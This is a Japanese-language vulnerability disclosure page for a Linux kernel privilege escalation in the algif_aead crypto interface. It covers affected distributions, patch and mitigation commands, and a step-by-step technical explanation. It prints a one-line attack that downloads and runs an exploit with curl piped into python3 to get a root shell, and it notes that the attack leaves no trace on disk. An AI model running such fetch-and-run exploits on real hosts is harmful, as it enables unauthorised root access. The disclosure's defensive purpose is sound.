Copy Fail:クリティカルなLinuxカーネルエクスプロイト CVE-2026-31431
Copy Fail:静かなLinuxカーネルキラー (CVE-2026-31431)
わずか732バイトのPythonスクリプト。4つの主要Linuxディストリビューション。4つのrootシェル — 修正なし、再コンパイルなし、手間なし。Copy Fail(CVE-2026-31431)へようこそ。最近のLinux史上最もポータブルなローカル特権昇格です。
どこでも動作するエクスプロイト
Xint CodeによるAI支援監査で発見されたCopy Failは、algif_aead暗号インターフェースの2017年のカーネル最適化を悪用します。非特権ユーザーは、任意の読み取り可能ファイル — /usr/bin/suのようなsetuid-rootバイナリを含む — のページキャッシュに4バイトの制御データを直接書き込めます。
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
1回で成功。100%信頼性。すべてのディストリビューション。
誰がパニックになるべきか(パッチ順序)
| 優先度 | 環境 | リスク |
|---|---|---|
| 🟥 高 | 多テナントホスト、Kubernetes、CIランナー | 任意ユーザー → ホストroot |
| 🟥 高 | クラウドSaaS、ノートブックホスト | テナント脱出 → ホスト |
| 🟨 中 | 単一テナントサーバー | 内部LPEチェーン |
| 🟢 低 | 単一ユーザー workstation | 事後エクスプロイトのみ |
確認済み影響範囲: Ubuntu 24.04、Amazon Linux 2023、RHEL 10、SUSE 16(ほか続報)。
Copy Failの違い
| 特性 | 典型的なLPE | Copy Fail |
|---|---|---|
| 競合状態 | ✅ 必要 | ❌ なし |
| ディストリビューションごとのオフセット | ✅ 必要 | ❌ ユニバーサル |
| 信頼性 | 30-80% | ✅ 100%単発 |
| 影響範囲 | 狭い範囲 | 2017 → 2026 (9年) |
| コンテナ脱出 | ❌ ホスト限定 | ✅ クロステナント |
Dirty Pipe(パイプフラグ)やDirty Cow(競合状態)とは異なり、Copy FailはAEAD scatterlistの誤処理を悪用する直線コードです。
即時緩和策
1. パッチ(主)
# メインブランチのコミット a664bf3d603d を含むカーネルに更新
apt update && apt upgrade linux-image-generic # Ubuntu
yum update kernel # RHEL
zypper update kernel # SUSE
2. 緊急無効化(パッチ前)
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
パフォーマンス影響: 99.9%のワークロードに影響なし。稀なAF_ALGユーザーのみ。
3. コンテナ強化
信頼できないワークロードでseccompによりAF_ALGソケットをブロック。
技術的詳細
脆弱性はalgif_aead(AF_ALGソケットファミリ)に存在します。2017年の「最適化」で、ページキャッシュページ(読み取り専用ソース)が書き込み可能宛先scatterlistになりました。
splice()がページキャッシュページをcrypto scatterlistに供給- AEAD認証がバッファ境界を超えて4バイトのAAD ESNを書き込み
authenc_esnが上書きされたページキャッシュバイトを復元しないexecve(/usr/bin/su)が破損したページキャッシュを読み取り → rootシェル
ステルスボーナス: VFS書き込みなし、dirtyページなし、ディスク変更なし。キャッシュ排出または再起動 → クリーンなファイル。
公開タイムライン
- 2026-03-23: カーネルチームに報告
- 2026-04-01: パッチコミット
- 2026-04-29: 公開
責任ある防御
PoCは公開(sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9)で、防御者がパッチをテスト可能。承認されたシステムでのみ実行。
多テナント運用者: 昨日パッチを適用。この理論ではありません。
Xint Code が見つけた — 実際に機能するAIセキュリティ監査。